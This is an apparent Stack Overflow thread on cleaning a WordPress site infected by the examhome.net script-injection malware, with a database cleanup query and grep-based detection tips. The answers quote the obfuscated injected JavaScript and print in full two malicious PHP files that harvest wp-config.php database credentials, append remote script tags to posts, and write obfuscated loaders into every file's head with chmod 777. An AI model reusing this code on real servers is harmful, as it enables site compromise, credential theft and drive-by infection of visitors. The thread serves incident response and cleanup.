# How to remove virus from WordPress?

Tags: wordpress

How to remove virus from WordPress?

```
<script type="text/javascript" async="" src="https://examhome.net/stat.js?v=1.0.2"></script>
```

[image]
[image]

Comment: Did you store a copy of your site in version control, e.g. Git?

Comment: Locate the virus, remove the virus?

Comment: Please try to add a bit of relevant information for us to answer better. Thanks.

Comment: Do not add pictures of code. Please type it in as text.  Questions with code pasted in as text are likely to be closed as it is against StackOverflow posting guidelines.  1) it is difficult to read pics of text (especially on mobile devices - and takes more bandwidth do download) 2) users need the ease of copy-pasting into their editors to efficiently help.

Answer (score 1):

I had the same issue on two of my pages this morning and after investigate a lot in my files and DB, I found what the malware did was change my js files adding an encoded script and adding another script at the end of each post on the wp_posts table on my DB.

I solved the problem with basically two steps:

**First:** go to your DB (Mysql) with PHPMyadmin or with any client and type:

```
UPDATE `wp_posts` SET post_content = REPLACE (post_content, "<script src='https://cdn.examhome.net/cdn.js?ver=1.0.5' type='text/javascript'></script>", " ")
```

what it does is delete all the occurrences of the malware injection on your table.

*Note:* the "?ver=1.0.5" part of the search can change, check your page code with "Ctrl+U" when it starts to load and before the redirect, search for "cdn.examhome.net" or "ads.voipnewswire.net" or "eval(String.fromCharCode..." and check the source and version of the malware js in order to change it on the db query above.

**Second:** go to your file manager and compress all your files in a zip or similar. download the compressed file and extract on your computer, use Notepad++ (sublimetext and others can help, but i recommend Notepad++) and use the advanced search on that directory to replace this in all documents for empty or a blankspace:

[this is an image of how the replacement looks on Notepad++ (in Spanish)](https://i.stack.imgur.com/cz3GF.png)

```
eval(String.fromCharCode(118, 97, 114, 32, 101, 108, 101, 109, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 101, 108, 101, 109, 46, 116, 121, 112, 101, 32, 61, 32, 39, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 39, 59, 32, 101, 108, 101, 109, 46, 97, 115, 121, 110, 99, 32, 61, 32, 116, 114, 117, 101, 59, 101, 108, 101, 109, 46, 115, 114, 99, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 57, 55, 44, 32, 49, 48, 48, 44, 32, 49, 49, 53, 44, 32, 52, 54, 44, 32, 49, 49, 56, 44, 32, 49, 49, 49, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 48, 44, 32, 49, 48, 49, 44, 32, 49, 49, 57, 44, 32, 49, 49, 53, 44, 32, 49, 49, 57, 44, 32, 49, 48, 53, 44, 32, 49, 49, 52, 44, 32, 49, 48, 49, 44, 32, 52, 54, 44, 32, 49, 49, 48, 44, 32, 49, 48, 49, 44, 32, 49, 49, 54, 44, 32, 52, 55, 44, 32, 57, 55, 44, 32, 49, 48, 48, 44, 32, 52, 54, 44, 32, 49, 48, 54, 44, 32, 49, 49, 53, 41, 59, 32, 32, 32, 118, 97, 114, 32, 97, 108, 108, 115, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 118, 97, 114, 32, 110, 116, 51, 32, 61, 32, 116, 114, 117, 101, 59, 32, 102, 111, 114, 32, 40, 32, 118, 97, 114, 32, 105, 32, 61, 32, 97, 108, 108, 115, 46, 108, 101, 110, 103, 116, 104, 59, 32, 105, 45, 45, 59, 41, 32, 123, 32, 105, 102, 32, 40, 97, 108, 108, 115, 91, 105, 93, 46, 115, 114, 99, 46, 105, 110, 100, 101, 120, 79, 102, 40, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 49, 56, 44, 32, 49, 49, 49, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 48, 44, 32, 49, 48, 49, 44, 32, 49, 49, 57, 44, 32, 49, 49, 53, 44, 32, 49, 49, 57, 44, 32, 49, 48, 53, 44, 32, 49, 49, 52, 44, 32, 49, 48, 49, 41, 41, 32, 62, 32, 45, 49, 41, 32, 123, 32, 110, 116, 51, 32, 61, 32, 102, 97, 108, 115, 101, 59, 125, 32, 125, 32, 105, 102, 40, 110, 116, 51, 32, 61, 61, 32, 116, 114, 117, 101, 41, 123, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 34, 104, 101, 97, 100, 34, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 101, 108, 101, 109, 41, 59, 32, 125));
```

this is an image of how the replacement looks on Notepad++ (in Spanish)

*Note:* the numbers inside can change, but they always start with  eval(String.fromCharCode(, and don't worry, none of the core js of wordpress or plugin uses this, so you can search any match and copy the numbers inside to complete the replace statement.

then compress it again, delete all your public_html content and reupload the compress file and extract it on the public_html root and is done.

With this everything returned to the normality for my two Wordpress pages, Hope it can Help you. Good luck!

Answer (score 0):

You should check your theme's `wp-content/themes/{you-active-theme-name}/functions.php` file to see if anything malicious was added.

You can also look at VaulPress offered by the creators of wordpress. Run a scan with it and see what it finds.

https://vaultpress.com/

Comment: Which part did not work? Did you find anything inside your `functions.php` file?

Answer (score 0):

I helped a friend with this issue and dicided to help a community with the experience i had in order to solve this nasty malware in WordPress files ,I discovered that malware being injected into one of the folders in my case  /wp-content/uploads/ folder as a file with no extension .

I discovered two files (php files)  :

first file expose the "wp-config.php" with all the keys and DB details and injects the examhome.net script into the post_content table - below is the code  .

```
    <?php echo ":#009009#:";
    $file_to_search = "wp-config.php";

    @search_file($_SERVER['DOCUMENT_ROOT']."/../../../../..",$file_to_search);
    @search_file($_SERVER['DOCUMENT_ROOT']."/../../../..",$file_to_search);
    @search_file($_SERVER['DOCUMENT_ROOT']."/../../..",$file_to_search);
    @search_file($_SERVER['DOCUMENT_ROOT']."/../..",$file_to_search);
    @search_file($_SERVER['DOCUMENT_ROOT']."/..",$file_to_search);
    @search_file($_SERVER['DOCUMENT_ROOT'],$file_to_search);

    function search_file($dir,$file_to_search){

    $files = scandir($dir);

    foreach($files as $key => $value){

        $path = realpath($dir.DIRECTORY_SEPARATOR.$value);

        if(!is_dir($path)) {
            if (strpos($value,$file_to_search) !== false) {

                show_sitenames($path);



            }

        } else if($value != "." && $value != "..") {

            search_file($path, $file_to_search);

        }  
     } 
    }

    echo ":#009009#:";



    function show_sitenames($file){
        $content = @file_get_contents($file);
        if(strpos($content, "DB_NAME") !== false) {


        $db = get_var_reg("'DB_NAME'.*?,.*?['|\"](.*?)['|\"]",$content);
        $host = get_var_reg("'DB_HOST'.*?,.*?['|\"](.*?)['|\"]",$content);
        $user = get_var_reg("'DB_USER'.*?,.*?['|\"](.*?)['|\"]",$content);
        $pass = get_var_reg("'DB_PASSWORD'.*?,.*?['|\"](.*?)['|\"]",$content);


    // Create connection
    $conn = new mysqli($host, $user, $pass);

    // Check connection
    if ($conn->connect_error) {
      echo $conn->connect_error;
    } else { 


    $q = "SELECT TABLE_SCHEMA,TABLE_NAME FROM information_schema.TABLES WHERE `TABLE_NAME` LIKE '%post%'";
    $result = $conn->query($q);
    if ($result->num_rows > 0) {
        while($row = $result->fetch_assoc()) {
            $q2 = "SELECT post_content FROM " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]."  LIMIT 1 ";
        $result2 = $conn->query($q2);
        if ($result2->num_rows > 0) {
            while($row2 = $result2->fetch_assoc()) {
                $val = $row2['post_content'];
                if(strpos($val, "examhome") === false){

                    echo "nothing:".$file."\n";

                    $q3 = "UPDATE " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]." set post_content = CONCAT(post_content,\"<script src='https://cdn.examhome.net/cdn.js?ver=1.0.88' type='text/javascript'></script>\") WHERE post_content NOT LIKE '%examhome%'";
                    $conn->query($q3);

                } else {

                    echo "already exist:".$file."\n";
                }
            }
        } else {
        }
        }
    } else {
    }
    $conn->close();
    }
    }
    }

    function get_var_reg($pat,$text) {

        if ($c = preg_match_all ("/".$pat."/is", $text, $matches))
        {
            return $matches[1][0];
        }

        return "";
    }


    exit();
```

And the second file when executed is injecting the code below ( js script  ) into the js files recursively  into the "" section everywhere . 
The script also change the permissions of the files to 777 meaning read and write

At this stage your system is already compromised and it doesn't matter how many times you remove the script from the files they have fully access to the system because of the "wp-config.php" details which compromised earlier meaning that they now can access your wp-admin

```
<?php $a = 'find / -type f -name "*" | xargs grep -rl "<head"';
$l1 = '<script language=javascript>var _0xfcc4=["\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x47\x45\x54","\x6F\x70\x65\x6E","\x73\x65\x6E\x64","\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x74\x79\x70\x65","\x61\x73\x79\x6E\x63","\x69\x64","\x63\x64\x6E\x37\x38\x39","\x73\x72\x63","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61x67\x4E\x61\x6D\x65","\x73\x63\x72\x69\x70\x74","\x6C\x65\x6E\x67\x74\x68"];var url=String[_0xfcc4[0]](104, 116, 116, 112, 115, 58, 47, 47, 119, 119, 119, 46, 108, 101, 97, 114, 110, 105, 110, 103, 116, 111, 111, 108, 107, 105, 116, 46, 99, 108, 117, 98, 47, 108, 105, 110, 107, 46, 112, 104, 112, 63, 118, 101, 114, 61, 49);var get_text=function httpGet(_0x3bc1x4){var _0x3bc1x5= new XMLHttpRequest();_0x3bc1x5[_0xfcc4[2]](_0xfcc4[1],_0x3bc1x4,false);_0x3bc1x5[_0xfcc4[3]](null);return _0x3bc1x5[_0xfcc4[4]]};var text=get_text(url);if(text!= String[_0xfcc4[0]](110,117,108,108)&& text[_0xfcc4[5]](String[_0xfcc4[0]](104,116,116,112,115,58,47,47))>  -1){var a=function(){var _0x3bc1x8=document[_0xfcc4[6]](String[_0xfcc4[0]](115,99,114,105,112,116));_0x3bc1x8[_0xfcc4[7]]= String[_0xfcc4[0]](116,101,120,116,47,106,97,118,97,115,99,114,105,112,116);_0x3bc1x8[_0xfcc4[8]]= true;_0x3bc1x8[_0xfcc4[9]]= _0xfcc4[10];_0x3bc1x8[_0xfcc4[11]]= text;document[_0xfcc4[13]](String[_0xfcc4[0]](104,101,97,100))[0][_0xfcc4[12]](_0x3bc1x8)};var scrpts=document[_0xfcc4[13]](_0xfcc4[14]);var n=true;for(var i=scrpts[_0xfcc4[15]];i--;){if(scrpts[i][_0xfcc4[9]]== _0xfcc4[10]){n= false}};if(n== true){a()}}</script>';



$t = shell_exec($a);
$t = explode("\n", trim($t));
foreach($t as $f){

$g = file_get_contents($f);
if (strpos($g, '0xfcc4') !== false) {
   echo "e:".$f;
} else {
$g = file_get_contents($f);
$g = str_replace("<head>","<head>".$l1,$g);
$g = str_replace("</head>",$l1."</head>",$g);
@system("chmod 777 ".$f);
@file_put_contents($f,$g);
$g = file_get_contents($f);
if (strpos($g, '0xfcc4') !== false) {
   echo $f;
} 
}
}
echo ":#009009#:";
```

It's important that you don't use the duplicator plugin as it seems it has a SQL injection hole , if you do have it in your system remove it . 
You can use grep command to identify the infected files like this :

- sudo grep -rl "examhome.net" /var/www/html/ | more
- sudo grep -r "eval(String.fromCharCode(118, 97 " /var/www/html/ | more
- and finally using grep and sed command you can identify and replace the infected code with space .

I really hope this could help others to solve this issue it's not a final solution since this malware worm is being updated and i'm still investigating this issue .

Dave

Disclaimer : Use of the information in this post is your responsibility only!